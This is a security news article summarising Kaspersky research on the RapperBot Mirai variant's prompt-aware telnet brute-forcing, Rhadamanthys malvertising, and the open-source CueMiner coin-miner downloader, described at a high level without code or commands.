RapperBot, a new Mirai variant, is the latest example of malware spreading through relatively uncommon or previously undiscovered infection channels.
RapperBot originally appeared last year as Internet of Things (IoT) malware that contained big amounts of Mirai source code but had significantly different capabilities than other Mirai variants. The differences included the use of a new command-and-control (C2) protocol and a built-in functionality for brute-forcing SSH servers rather than Telnet services, as is usual in Mirai variants.
Fortinet researchers who tracked the malware last year noticed its makers continually changing it, first by adding code to ensure persistence on infected PCs even after a reboot, and then by inserting code for self-propagation through a remote binary downloader. The virus writers later deleted the self-propagation feature and replaced it with one that gave them persistent remote access to brute-forced SSH servers.
Kaspersky researchers detected a new RapperBot variant circulating in the open in the fourth quarter of 2022, where the SSH brute-force functionality had been deleted and replaced with capabilities for targeting telnet servers.
According to Kaspersky's examination of the malware, it also had a "intelligent" and relatively unusual function for brute-forcing telnet. Rather of brute-forcing with a large number of credentials, the virus examines the prompts received when it telnets to a device and selects the proper set of credentials for a brute-force attack based on that. When compared to many other malware solutions, this greatly speeds up the brute-forcing process, says Kaspersky.
"When you telnet to a device, you typically get a prompt," explains Jornt van der Wiel, a senior security researcher at Kaspersky. As stated by RapperBot, the prompt can expose certain information that it uses to determine which device to attack and which credentials to utilize.
RapperBot utilizes different credentials depending on the IoT device being attacked, he claims. "So, for device A, it uses user/password set A; and for device B, it uses user/password set B," van der Wiel explains.
The malware then uses commands like "wget," "curl," and "ftpget" to download itself onto the target system. If none of these techniques succeed, the malware downloads and installs itself on the device, according to Kaspersky.
RapperBot's brute-force method is unusual, and van der Weil says he can't think of any other malware variants that use it. Nonetheless, given the vast amount of malware copies in the field, it's impossible to say whether this is the only infection currently employing this strategy.
New and Unusual Strategies
RapperBot is one example of malware that uses unusual and often previously unknown tactics to spread, according to Kaspersky. Another example is "Rhadamanthys," a data thief provided as malware-as-a-service on a Russian-language cybercriminal forum. The info stealer is one of an increasing number of malware families distributed by threat actors using malicious ads.
On online ad platforms, adversaries plant malware-laden adverts or advertisements with links to phishing sites. Often, the advertisements are for real software goods and programs, and they include keywords that ensure they appear high in search engine results or when users visit specific websites. In recent months, threat actors have utilized so-called malvertisements to target users of popular password managers such as LastPass, Bitwarden, and 1Password.
The increasing success of threat actors with malvertising frauds is driving up the use of the strategy. For example, the authors of Rhadamanthys exploited phishing and spam emails as first infector vectors before resorting to malicious ads.
"Rhadamanthys does nothing different than other malvertising campaigns," van der Weil explains. "It is, however, part of a trend that we see malvertising becoming more popular."
Another trend identified by Kaspersky is the increased usage of open-source malware by less-skilled attackers. Consider CueMiner, a GitHub downloader for coin-mining malware. The infection was distributed by attackers using Trojanized copies of cracked software downloaded over BitTorrent or OneDrive sharing networks, according to Kaspersky researchers.
"Due to its open source nature, everybody can download and compile it," van der Weil explains. "As these users are typically not very advanced cybercriminals, they have to rely on relatively simple infection mechanisms, such as BitTorrent and OneDrive."